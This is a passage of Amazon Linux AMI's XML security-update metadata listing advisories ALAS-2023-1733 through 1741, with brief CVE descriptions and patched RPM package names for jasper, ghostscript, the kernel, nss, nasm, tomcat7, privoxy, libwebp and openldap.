arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.87-1.92.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.87-1.92.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.87-1.92.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.87-1.92.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.87-1.92.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.87-1.92.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1733</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1733: important priority package update for jasper</title><issued date="2023-04-13 19:01:00" /><updated date="2023-04-20 20:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3467:
A NULL pointer dereference flaw was found in the way Jasper versions before 2.0.26 handled component references in CDEF box in the JP2 image format decoder. A specially crafted JP2 image file could cause an application using the Jasper library to crash when opened.
CVE-2021-3443:
A NULL pointer dereference flaw was found in the way Jasper versions before 2.0.27 handled component references in the JP2 image format decoder. A specially crafted JP2 image file could cause an application using the Jasper library to crash when opened.
CVE-2021-3272:
jp2_decode in jp2/jp2_dec.c in libjasper in JasPer 2.0.24 has a heap-based buffer over-read when there is an invalid relationship between the number of channels and the number of image components.
CVE-2021-26927:
A flaw was found in jasper before 2.0.25. A null pointer dereference in jp2_decode in jp2_dec.c may lead to program crash and denial of service.
CVE-2021-26926:
A flaw was found in jasper before 2.0.25. An out of bounds read issue was found in jp2_decode function whic may lead to disclosure of information or program crash.
CVE-2020-27828:
A flaw was found in the Jasper tool's jpc encoder. This flaw allows an attacker to craft input provided to Jasper, causing an arbitrary out-of-bounds write. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27828" title="" id="CVE-2020-27828" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26926" title="" id="CVE-2021-26926" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26927" title="" id="CVE-2021-26927" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3272" title="" id="CVE-2021-3272" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3443" title="" id="CVE-2021-3443" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3467" title="" id="CVE-2021-3467" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="jasper-utils" version="1.900.1" release="21.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-utils-1.900.1-21.12.amzn1.x86_64.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="21.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-devel-1.900.1-21.12.amzn1.x86_64.rpm</filename></package><package name="jasper-libs" version="1.900.1" release="21.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-libs-1.900.1-21.12.amzn1.x86_64.rpm</filename></package><package name="jasper-debuginfo" version="1.900.1" release="21.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-debuginfo-1.900.1-21.12.amzn1.x86_64.rpm</filename></package><package name="jasper" version="1.900.1" release="21.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-1.900.1-21.12.amzn1.x86_64.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="21.12.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-devel-1.900.1-21.12.amzn1.i686.rpm</filename></package><package name="jasper" version="1.900.1" release="21.12.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-1.900.1-21.12.amzn1.i686.rpm</filename></package><package name="jasper-libs" version="1.900.1" release="21.12.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-libs-1.900.1-21.12.amzn1.i686.rpm</filename></package><package name="jasper-utils" version="1.900.1" release="21.12.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-utils-1.900.1-21.12.amzn1.i686.rpm</filename></package><package name="jasper-debuginfo" version="1.900.1" release="21.12.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-debuginfo-1.900.1-21.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1734</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1734: important priority package update for ghostscript</title><issued date="2023-04-27 16:19:00" /><updated date="2023-05-03 18:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-28879:
In Artifex Ghostscript through 10.01.0, there is a buffer overflow leading to potential corruption of data internal to the PostScript interpreter, in base/sbcp.c. This affects BCPEncode, BCPDecode, TBCPEncode, and TBCPDecode. If the write buffer is filled to one byte less than full, and one then tries to write an escaped character, two bytes are written.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28879" title="" id="CVE-2023-28879" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-devel" version="8.70" release="24.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.28.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.28.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.28.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.28.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.28.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.28.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="24.28.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.28.amzn1.i686.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.28.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.28.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.28.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1735</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1735: important priority package update for kernel</title><issued date="2023-04-27 16:19:00" /><updated date="2023-06-29 23:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-33203:
The Linux kernel before 6.2.9 has a race condition and resultant use-after-free in drivers/net/ethernet/qualcomm/emac/emac.c if a physically proximate attacker unplugs an emac based device.
CVE-2023-23454:
cbq_classify in net/sched/sch_cbq.c in the Linux kernel through 6.1.4 allows attackers to cause a denial of service (slab-out-of-bounds read) because of type confusion (non-negative numbers can sometimes indicate a TC_ACT_SHOT condition rather than valid classification results).
CVE-2023-2124:
An out-of-bounds memory access flaw was found in the Linux kernel's XFS file system in how a user restores an XFS image after failure (with a dirty log journal). This flaw allows a local user to crash or potentially escalate their privileges on the system.
CVE-2023-1838:
A use-after-free flaw was found in vhost_net_set_backend in drivers/vhost/net.c in virtio network subcomponent in the Linux kernel due to a double fget. This flaw could allow a local attacker to crash the system, and could even lead to a kernel information leak problem.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1838" title="" id="CVE-2023-1838" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2124" title="" id="CVE-2023-2124" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23454" title="" id="CVE-2023-23454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33203" title="" id="CVE-2023-33203" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.313-162.533.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.313-162.533.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.313-162.533.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.313-162.533.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.313-162.533.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.313-162.533.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.313-162.533.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.313-162.533.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.313-162.533.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.313-162.533.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1736</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1736: important priority package update for nss</title><issued date="2023-04-27 16:19:00" /><updated date="2023-05-03 18:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-0767:
firefox-esr , thunderbird and nss only are affected by this package.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0767" title="" id="CVE-2023-0767" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss" version="3.53.1" release="7.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.53.1-7.88.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.53.1" release="7.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.53.1-7.88.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.53.1" release="7.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.53.1-7.88.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.53.1" release="7.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.53.1-7.88.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.53.1" release="7.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.53.1-7.88.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.53.1" release="7.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.53.1-7.88.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.53.1" release="7.88.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.53.1-7.88.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.53.1" release="7.88.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.53.1-7.88.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.53.1" release="7.88.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.53.1-7.88.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.53.1" release="7.88.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.53.1-7.88.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.53.1" release="7.88.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.53.1-7.88.amzn1.i686.rpm</filename></package><package name="nss" version="3.53.1" release="7.88.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.53.1-7.88.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1737</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1737: important priority package update for nasm</title><issued date="2023-04-27 16:19:00" /><updated date="2023-05-03 18:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-44370:
NASM v2.16 was discovered to contain a heap buffer overflow in the component quote_for_pmake() asm/nasm.c:856
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44370" title="" id="CVE-2022-44370" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nasm-doc" version="2.10.07" release="7.8.amzn1" epoch="0" arch="noarch"><filename>Packages/nasm-doc-2.10.07-7.8.amzn1.noarch.rpm</filename></package><package name="nasm-rdoff" version="2.10.07" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/nasm-rdoff-2.10.07-7.8.amzn1.x86_64.rpm</filename></package><package name="nasm" version="2.10.07" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/nasm-2.10.07-7.8.amzn1.x86_64.rpm</filename></package><package name="nasm-debuginfo" version="2.10.07" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/nasm-debuginfo-2.10.07-7.8.amzn1.x86_64.rpm</filename></package><package name="nasm-rdoff" version="2.10.07" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/nasm-rdoff-2.10.07-7.8.amzn1.i686.rpm</filename></package><package name="nasm" version="2.10.07" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/nasm-2.10.07-7.8.amzn1.i686.rpm</filename></package><package name="nasm-debuginfo" version="2.10.07" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/nasm-debuginfo-2.10.07-7.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1738</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1738: important priority package update for tomcat7</title><issued date="2023-04-27 16:19:00" /><updated date="2023-05-11 18:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-24998:
Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed resulting in the possibility of an attacker triggering a DoS with a malicious upload or series of uploads. Note that, like all of the file upload limits, the new configuration option (FileUploadBase#setFileCountMax) is not enabled by default and must be explicitly configured.
CVE-2022-4132:
Tomcat: Memory leak
CVE-2017-12616:
When using a VirtualDirContext with Apache Tomcat 7.0.0 to 7.0.80 it was possible to bypass security constraints and/or view the source code of JSPs for resources served by the VirtualDirContext using a specially crafted request.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12616" title="" id="CVE-2017-12616" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4132" title="" id="CVE-2022-4132" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24998" title="" id="CVE-2023-24998" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.109-1.42.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.109-1.42.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.109-1.42.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.109-1.42.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.109-1.42.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.109-1.42.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.109-1.42.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.109-1.42.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.109-1.42.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.109-1.42.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1739</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1739: important priority package update for privoxy</title><issued date="2023-04-27 16:19:00" /><updated date="2023-05-03 18:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-44542:
A memory leak vulnerability was found in Privoxy when handling errors.
CVE-2021-44540:
A vulnerability was found in Privoxy which was fixed in get_url_spec_param() by freeing memory of compiled pattern spec before bailing.
CVE-2021-20275:
A flaw was found in privoxy before 3.0.32. A invalid read of size two may occur in chunked_body_is_complete() leading to denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20275" title="" id="CVE-2021-20275" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44540" title="" id="CVE-2021-44540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44542" title="" id="CVE-2021-44542" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="privoxy" version="3.0.23" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/privoxy-3.0.23-2.17.amzn1.x86_64.rpm</filename></package><package name="privoxy-debuginfo" version="3.0.23" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/privoxy-debuginfo-3.0.23-2.17.amzn1.x86_64.rpm</filename></package><package name="privoxy" version="3.0.23" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/privoxy-3.0.23-2.17.amzn1.i686.rpm</filename></package><package name="privoxy-debuginfo" version="3.0.23" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/privoxy-debuginfo-3.0.23-2.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1740</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1740: medium priority package update for libwebp</title><issued date="2023-04-27 16:19:00" /><updated date="2023-05-03 18:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-36331:
A flaw was found in libwebp in versions before 1.0.1. An out-of-bounds read was found in function ChunkAssignData. The highest threat from this vulnerability is to data confidentiality and to the service availability.
CVE-2020-36330:
A flaw was found in libwebp in versions before 1.0.1. An out-of-bounds read was found in function ChunkVerifyAndAssign. The highest threat from this vulnerability is to data confidentiality and to the service availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36330" title="" id="CVE-2020-36330" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36331" title="" id="CVE-2020-36331" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libwebp-devel" version="0.3.0" release="10.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-devel-0.3.0-10.8.amzn1.x86_64.rpm</filename></package><package name="libwebp" version="0.3.0" release="10.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-0.3.0-10.8.amzn1.x86_64.rpm</filename></package><package name="libwebp-java" version="0.3.0" release="10.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-java-0.3.0-10.8.amzn1.x86_64.rpm</filename></package><package name="libwebp-tools" version="0.3.0" release="10.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-tools-0.3.0-10.8.amzn1.x86_64.rpm</filename></package><package name="libwebp-debuginfo" version="0.3.0" release="10.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-debuginfo-0.3.0-10.8.amzn1.x86_64.rpm</filename></package><package name="libwebp-devel" version="0.3.0" release="10.8.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-devel-0.3.0-10.8.amzn1.i686.rpm</filename></package><package name="libwebp" version="0.3.0" release="10.8.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-0.3.0-10.8.amzn1.i686.rpm</filename></package><package name="libwebp-java" version="0.3.0" release="10.8.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-java-0.3.0-10.8.amzn1.i686.rpm</filename></package><package name="libwebp-tools" version="0.3.0" release="10.8.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-tools-0.3.0-10.8.amzn1.i686.rpm</filename></package><package name="libwebp-debuginfo" version="0.3.0" release="10.8.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-debuginfo-0.3.0-10.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1741</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1741: important priority package update for openldap</title><issued date="2023-04-27 16:19:00" /><updated date="2023-05-03 18:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-27212:
In OpenLDAP through 2.4.57 and 2.5.x through 2.5.1alpha, an assertion ...
NOTE: https://bugs.openldap.org/show_bug.cgi?id=9454
NOTE: trunk: https://git.openldap.org/openldap/openldap/-/commit/3539fc33212b528c56b716584f2c2994af7c30b0
NOTE: REL_ENG 2.4.x: https://git.openldap.org/openldap/openldap/-/commit/9badb73425a67768c09bcaed1a9c26c684af6c30
CVE-2020-36230:
A flaw was discovered in OpenLDAP before 2.4.57 leading in an assertion failure in slapd in the X.509 DN parsing in decode.c ber_next_element, resulting in denial of service.
CVE-2020-36229:
A flaw was discovered in ldap_X509dn2bv in OpenLDAP before 2.4.57 leading to a slapd crash in the X.509 DN parsing in ad_keystring, resulting in denial of service.
CVE-2020-36228:
An integer underflow was discovered in OpenLDAP before 2.4.57 leading to a slapd crash in the Certificate List Exact Assertion processing, resulting in denial of service.
CVE-2020-36227:
A flaw was discovered in OpenLDAP before 2.4.57 leading to an infinite loop in slapd with the cancel_extop Cancel operation, resulting in denial of service.
CVE-2020-36226:
A flaw was discovered in OpenLDAP before 2.4.57 leading to a memch->bv_len miscalculation and slapd crash in the saslAuthzTo processing, resulting in denial of service.
CVE-2020-36225:
A flaw was discovered in OpenLDAP before 2.4.57 leading to a double free and slapd crash in the saslAuthzTo processing, resulting in denial of service.
CVE-2020-36224:
A flaw was discovered in OpenLDAP before 2.4.57 leading to an invalid pointer free and slapd crash in the saslAuthzTo processing, resulting in denial of service.
CVE-2020-36223:
A flaw was discovered in OpenLDAP before 2.4.57 leading to a slapd crash in the Values Return Filter control handling, resulting in denial of service (double free and out-of-bounds read).
CVE-2020-36222:
A flaw was discovered in OpenLDAP before 2.4.57 leading to an assertion failure in slapd in the saslAuthzTo validation, resulting in denial of service.
CVE-2020-36221:
An integer underflow was discovered in OpenLDAP before 2.4.57 leading to slapd crashes in the Certificate Exact Assertion processing, resulting in denial of service (schema_init.c serialNumberAndIssuerCheck).
CVE-2019-13565:
An issue was discovered in OpenLDAP 2.x before 2.4.48. When using SASL authentication and session encryption, and relying on the SASL security layers in slapd access controls, it is possible to obtain access that would otherwise be denied via a simple bind for any identity covered in those ACLs. After the first SASL bind is completed, the sasl_ssf value is retained for all new non-SASL connections. Depending on the ACL configuration, this can affect different types of operations (searches, modifications, etc.). In other words, a successful authorization step completed by one user affects the authorization requirement for a different user.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13565" title="" id="CVE-2019-13565" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36221" title="" id="CVE-2020-36221" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36222" title="" id="CVE-2020-36222" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36223" title="" id="CVE-2020-36223" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36224" title="" id="CVE-2020-36224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36225" title="" id="CVE-2020-36225" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36226" title="" id="CVE-2020-36226" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36227" title="" id="CVE-2020-36227" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36228" title="" id="CVE-2020-36228" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36229" title="" id="CVE-2020-36229" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36230" title="" id="CVE-2020-36230" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27212" title="" id="CVE-2021-27212" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openldap" version="2.4.40" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-2.4.40-16.36.amzn1.x86_64.rpm</filename></package><package name="openldap-servers" version="2.4.40" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-2.4.40-16.36.amzn1.x86_64.rpm</filename></package><package name="openldap-devel" version="2.4.40" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-devel-2.4.40-16.36.amzn1.x86_64.rpm</filename></package><package name="openldap-debuginfo" version="2.4.40" 